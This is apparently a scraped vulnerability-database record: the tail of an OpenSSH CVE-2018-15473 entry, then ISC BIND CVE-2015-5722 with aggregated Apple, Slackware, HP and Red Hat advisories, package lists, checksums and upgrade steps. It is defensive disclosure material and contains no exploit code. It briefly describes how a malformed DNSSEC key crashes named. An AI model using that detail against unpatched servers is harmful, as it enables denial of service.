"https://www.ibm.com/blogs/psirt/security-bulletin-ibm-has-announced-a-release-for-ibm-security-identity-governance-and-intelligence-in-response-to-openssh-vulnerabilty-cve-2018-15473/" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-in-openssh-and-openssl-shipped-with-ibm-security-access-manager-appliance-cve-2018-15473-cve-2019-1559/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/78730" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/79026" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-directory-suite-vulnerable-to-information-disclosure-cve-2018-15473/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.2750" }, { "trust": 0.6, "url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10870680" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#low" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10708" }, { "trust": 0.1, "url": "https://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssh/1:7.2p2-4ubuntu2.6" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/usn/usn-3809-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssh/1:7.6p1-4ubuntu0.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssh/1:6.6p1-2ubuntu2.11" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.7_release_notes/index" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://security-tracker.debian.org/tracker/openssh" }, { "trust": 0.1, "url": "https://launchpad.net/bugs/1934501" }, { "trust": 0.1, "url": "https://ubuntu.com/security/notices/usn-3809-2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssh/1:7.6p1-4ubuntu0.5" }, { "trust": 0.1, "url": "https://ubuntu.com/security/notices/usn-3809-1" } ], "sources": [ { "db": "VULHUB", "id": "VHN-125736" }, { "db": "BID", "id": "105140" }, { "db": "JVNDB", "id": "JVNDB-2018-009191" }, { "db": "PACKETSTORM", "id": "149694" }, { "db": "PACKETSTORM", "id": "152444" }, { "db": "PACKETSTORM", "id": "150190" }, { "db": "PACKETSTORM", "id": "153906" }, { "db": "PACKETSTORM", "id": "149037" }, { "db": "PACKETSTORM", "id": "163809" }, { "db": "NVD", "id": "CVE-2018-15473" }, { "db": "CNNVD", "id": "CNNVD-201808-536" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-125736" }, { "db": "VULMON", "id": "CVE-2018-15473" }, { "db": "BID", "id": "105140" }, { "db": "JVNDB", "id": "JVNDB-2018-009191" }, { "db": "PACKETSTORM", "id": "149694" }, { "db": "PACKETSTORM", "id": "152444" }, { "db": "PACKETSTORM", "id": "150190" }, { "db": "PACKETSTORM", "id": "153906" }, { "db": "PACKETSTORM", "id": "149037" }, { "db": "PACKETSTORM", "id": "163809" }, { "db": "NVD", "id": "CVE-2018-15473" }, { "db": "CNNVD", "id": "CNNVD-201808-536" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-08-17T00:00:00", "db": "VULHUB", "id": "VHN-125736" }, { "date": "2018-08-17T00:00:00", "db": "VULMON", "id": "CVE-2018-15473" }, { "date": "2018-08-16T00:00:00", "db": "BID", "id": "105140" }, { "date": "2018-11-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-009191" }, { "date": "2018-10-07T19:19:00", "db": "PACKETSTORM", "id": "149694" }, { "date": "2019-04-09T17:52:27", "db": "PACKETSTORM", "id": "152444" }, { "date": "2018-11-06T21:04:06", "db": "PACKETSTORM", "id": "150190" }, { "date": "2019-08-06T20:56:04", "db": "PACKETSTORM", "id": "153906" }, { "date": "2018-08-22T18:18:00", "db": "PACKETSTORM", "id": "149037" }, { "date": "2021-08-12T15:49:43", "db": "PACKETSTORM", "id": "163809" }, { "date": "2018-08-17T19:29:00.223000", "db": "NVD", "id": "CVE-2018-15473" }, { "date": "2018-08-20T00:00:00", "db": "CNNVD", "id": "CNNVD-201808-536" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-02-23T00:00:00", "db": "VULHUB", "id": "VHN-125736" }, { "date": "2023-02-23T00:00:00", "db": "VULMON", "id": "CVE-2018-15473" }, { "date": "2019-04-19T07:00:00", "db": "BID", "id": "105140" }, { "date": "2018-11-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-009191" }, { "date": "2023-02-23T23:13:42.887000", "db": "NVD", "id": "CVE-2018-15473" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201808-536" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "149694" }, { "db": "PACKETSTORM", "id": "149037" }, { "db": "CNNVD", "id": "CNNVD-201808-536" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSH Vulnerable to information disclosure", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-009191" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "competition condition problem", "sources": [ { "db": "CNNVD", "id": "CNNVD-201808-536" } ], "trust": 0.6 } }
var-201509-0003
Vulnerability from variot
buffer.c in named in ISC BIND 9.x before 9.9.7-P3 and 9.10.x before 9.10.2-P4 allows remote attackers to cause a denial of service (assertion failure and daemon exit) by creating a zone containing a malformed DNSSEC key and issuing a query for a name in that zone. ISC BIND is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to crash the affected application, denying service to legitimate users. ISC BIND is a set of open source software that implements the DNS protocol maintained by the Internet Systems Consortium (ISC) company in the United States. A security vulnerability exists in the buffer.c file in named in versions 9.x prior to ISC BIND 9.9.7-P3 and 9.10.x prior to 9.10.2-P4. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2015-10-21-8 OS X Server 5.0.15
OS X Server 5.0.15 is now available and addresses the following:
BIND Available for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.1 or later Impact: Multiple vulnerabilities in BIND Description: Multiple vulnerabilities existed in BIND versions prior to 9.9.7-P3, one of which may have allowed a remote attacker to cause a denial of service. These issues were addressed by updating BIND to version 9.9.7-P3. CVE-ID CVE-2015-5722 : Hanno Böck from the Fuzzing Project CVE-2015-5986
Web Service Available for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.1 or later Impact: A remote attacker may be able to bypass access restrictions Description: An HTTP header field reference was missing from the configuration files. This issue was addressed by adding the HTTP header field reference to the configuration file. CVE-ID CVE-2015-7031 : an anonymous researcher
Installation note:
OS X Server 5.0.15 may be obtained from the Mac App Store.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/bind-9.9.7_P3-i486-1_slack14.1.txz: Upgraded. This update fixes two denial-of-service vulnerabilities: + CVE-2015-5722 is a denial-of-service vector which can be exploited remotely against a BIND server that is performing validation on DNSSEC-signed records. Validating recursive resolvers are at the greatest risk from this defect, but it has not been ruled out that it could be exploited against an authoritative-only nameserver under limited conditions. Servers that are not performing validation are not vulnerable. However, ISC does not recommend disabling validation as a workaround to this issue as it exposes the server to other types of attacks. Upgrading to the patched versions is the recommended solution. All versions of BIND since 9.0.0 are vulnerable to CVE-2015-5722. Validation is not required. Recursive resolvers are at the greatest risk from this defect, but it has not been ruled out that it could be exploited against an authoritative-only nameserver under limited conditions. Only versions of BIND since 9.9.7 and 9.10.2 are vulnerable to CVE-2015-5986. For more information, see: https://kb.isc.org/article/AA-01287/0 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5722 https://kb.isc.org/article/AA-01291/0 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5986 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bind-9.9.7_P3-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bind-9.9.7_P3-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bind-9.9.7_P3-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bind-9.9.7_P3-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bind-9.9.7_P3-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bind-9.9.7_P3-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bind-9.9.7_P3-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bind-9.9.7_P3-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bind-9.9.7_P3-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bind-9.9.7_P3-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.10.2_P4-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bind-9.10.2_P4-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 627f6c6827eca24776d790166801de25 bind-9.9.7_P3-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: 49082f50322af84efe8d91459599b837 bind-9.9.7_P3-x86_64-1_slack13.0.txz
Slackware 13.1 package: 4dd375df46e84dbecb9f296e2fec692a bind-9.9.7_P3-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 90b4376b145544d9a63c28dcb891ca47 bind-9.9.7_P3-x86_64-1_slack13.1.txz
Slackware 13.37 package: 181ce9e11eb9d909c5c06b8ddd5bb1b5 bind-9.9.7_P3-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: 368f7a3b977865b0132bdcd129e70813 bind-9.9.7_P3-x86_64-1_slack13.37.txz
Slackware 14.0 package: 3bb80a54fb5d0f76d17ef33cf06a074d bind-9.9.7_P3-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: d77b36e48e2c033ffa9d99816979304f bind-9.9.7_P3-x86_64-1_slack14.0.txz
Slackware 14.1 package: ada9c70208885b4c7904364e040360f9 bind-9.9.7_P3-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: a78fbe27ba2834d2918fa26ce96d5083 bind-9.9.7_P3-x86_64-1_slack14.1.txz
Slackware -current package: 450614c08d5fac56c8d2701394d1af50 n/bind-9.10.2_P4-i586-1.txz
Slackware x86_64 -current package: 32e680d6bce8dac3ad5ba54958f68f95 n/bind-9.10.2_P4-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg bind-9.9.7_P3-i486-1_slack14.1.txz
Then, restart the name server:
/etc/rc.d/rc.bind restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address.
Release Date: 2015-09-21 Last Updated: 2015-09-21
Potential Security Impact: Remote denial of service (DoS)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY A potential security vulnerability has been identified in the HP-UX BIND service running named. This vulnerability could be exploited remotely to create a Denial of Service (DoS).
References:
CVE-2015-5722 CVE-2015-5477 SSRT102248
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.31 BIND 9.7.3 prior to C.9.7.3.8.0 (named)
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2015-5722 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8 CVE-2015-5477 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following software update to resolve the vulnerability in the HP-UX BIND service running named.
BIND 9.7.3 for HP-UX Release Depot Name Download location
B.11.31 (PA and IA) HP_UX_11.31_HPUX-NameServer_C.9.7.3.8.0_HP-UX_B.11.31_IA_PA.depot https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumbe r=BIND
MANUAL ACTIONS: Yes - Update Download and install the software update
PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.31
NameService.BIND-AUX NameService.BIND-RUN action: install revision C.9.7.3.8.0 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 21 September 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: bind security update Advisory ID: RHSA-2015:1705-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1705.html Issue date: 2015-09-03 CVE Names: CVE-2015-5722 =====================================================================
- Summary:
Updated bind packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.
A denial of service flaw was found in the way BIND parsed certain malformed DNSSEC keys. (CVE-2015-5722)
Red Hat would like to thank ISC for reporting this issue. Upstream acknowledges Hanno Böck as the original reporter.
All bind users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the BIND daemon (named) will be restarted automatically.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1259087 - CVE-2015-5722 bind: malformed DNSSEC key failed assertion denial of service
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: bind-9.8.2-0.37.rc1.el6_7.4.src.rpm
i386: bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-libs-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-utils-9.8.2-0.37.rc1.el6_7.4.i686.rpm
x86_64: bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-libs-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-libs-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-utils-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: bind-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-devel-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.4.i686.rpm
x86_64: bind-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-devel-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-devel-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: bind-9.8.2-0.37.rc1.el6_7.4.src.rpm
x86_64: bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-libs-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-libs-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-utils-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: bind-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-devel-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-devel-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: bind-9.8.2-0.37.rc1.el6_7.4.src.rpm
i386: bind-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-libs-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-utils-9.8.2-0.37.rc1.el6_7.4.i686.rpm
ppc64: bind-9.8.2-0.37.rc1.el6_7.4.ppc64.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.4.ppc64.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.ppc.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.ppc64.rpm bind-libs-9.8.2-0.37.rc1.el6_7.4.ppc.rpm bind-libs-9.8.2-0.37.rc1.el6_7.4.ppc64.rpm bind-utils-9.8.2-0.37.rc1.el6_7.4.ppc64.rpm
s390x: bind-9.8.2-0.37.rc1.el6_7.4.s390x.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.4.s390x.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.s390.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.s390x.rpm bind-libs-9.8.2-0.37.rc1.el6_7.4.s390.rpm bind-libs-9.8.2-0.37.rc1.el6_7.4.s390x.rpm bind-utils-9.8.2-0.37.rc1.el6_7.4.s390x.rpm
x86_64: bind-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-libs-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-libs-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-utils-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-devel-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.4.i686.rpm
ppc64: bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.ppc.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.ppc64.rpm bind-devel-9.8.2-0.37.rc1.el6_7.4.ppc.rpm bind-devel-9.8.2-0.37.rc1.el6_7.4.ppc64.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.4.ppc64.rpm
s390x: bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.s390.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.s390x.rpm bind-devel-9.8.2-0.37.rc1.el6_7.4.s390.rpm bind-devel-9.8.2-0.37.rc1.el6_7.4.s390x.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.4.s390x.rpm
x86_64: bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-devel-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-devel-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: bind-9.8.2-0.37.rc1.el6_7.4.src.rpm
i386: bind-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-libs-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-utils-9.8.2-0.37.rc1.el6_7.4.i686.rpm
x86_64: bind-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-libs-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-libs-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-utils-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-devel-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.4.i686.rpm
x86_64: bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-devel-9.8.2-0.37.rc1.el6_7.4.i686.rpm bind-devel-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: bind-9.9.4-18.el7_1.5.src.rpm
noarch: bind-license-9.9.4-18.el7_1.5.noarch.rpm
x86_64: bind-debuginfo-9.9.4-18.el7_1.5.i686.rpm bind-debuginfo-9.9.4-18.el7_1.5.x86_64.rpm bind-libs-9.9.4-18.el7_1.5.i686.rpm bind-libs-9.9.4-18.el7_1.5.x86_64.rpm bind-libs-lite-9.9.4-18.el7_1.5.i686.rpm bind-libs-lite-9.9.4-18.el7_1.5.x86_64.rpm bind-utils-9.9.4-18.el7_1.5.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: bind-9.9.4-18.el7_1.5.x86_64.rpm bind-chroot-9.9.4-18.el7_1.5.x86_64.rpm bind-debuginfo-9.9.4-18.el7_1.5.i686.rpm bind-debuginfo-9.9.4-18.el7_1.5.x86_64.rpm bind-devel-9.9.4-18.el7_1.5.i686.rpm bind-devel-9.9.4-18.el7_1.5.x86_64.rpm bind-lite-devel-9.9.4-18.el7_1.5.i686.rpm bind-lite-devel-9.9.4-18.el7_1.5.x86_64.rpm bind-sdb-9.9.4-18.el7_1.5.x86_64.rpm bind-sdb-chroot-9.9.4-18.el7_1.5.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: bind-9.9.4-18.el7_1.5.src.rpm
noarch: bind-license-9.9.4-18.el7_1.5.noarch.rpm
x86_64: bind-debuginfo-9.9.4-18.el7_1.5.i686.rpm bind-debuginfo-9.9.4-18.el7_1.5.x86_64.rpm bind-libs-9.9.4-18.el7_1.5.i686.rpm bind-libs-9.9.4-18.el7_1.5.x86_64.rpm bind-libs-lite-9.9.4-18.el7_1.5.i686.rpm bind-libs-lite-9.9.4-18.el7_1.5.x86_64.rpm bind-utils-9.9.4-18.el7_1.5.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: bind-9.9.4-18.el7_1.5.x86_64.rpm bind-chroot-9.9.4-18.el7_1.5.x86_64.rpm bind-debuginfo-9.9.4-18.el7_1.5.i686.rpm bind-debuginfo-9.9.4-18.el7_1.5.x86_64.rpm bind-devel-9.9.4-18.el7_1.5.i686.rpm bind-devel-9.9.4-18.el7_1.5.x86_64.rpm bind-lite-devel-9.9.4-18.el7_1.5.i686.rpm bind-lite-devel-9.9.4-18.el7_1.5.x86_64.rpm bind-sdb-9.9.4-18.el7_1.5.x86_64.rpm bind-sdb-chroot-9.9.4-18.el7_1.5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: bind-9.9.4-18.el7_1.5.src.rpm
noarch: bind-license-9.9.4-18.el7_1.5.noarch.rpm
ppc64: bind-9.9.4-18.el7_1.5.ppc64.rpm bind-chroot-9.9.4-18.el7_1.5.ppc64.rpm bind-debuginfo-9.9.4-18.el7_1.5.ppc.rpm bind-debuginfo-9.9.4-18.el7_1.5.ppc64.rpm bind-libs-9.9.4-18.el7_1.5.ppc.rpm bind-libs-9.9.4-18.el7_1.5.ppc64.rpm bind-libs-lite-9.9.4-18.el7_1.5.ppc.rpm bind-libs-lite-9.9.4-18.el7_1.5.ppc64.rpm bind-utils-9.9.4-18.el7_1.5.ppc64.rpm
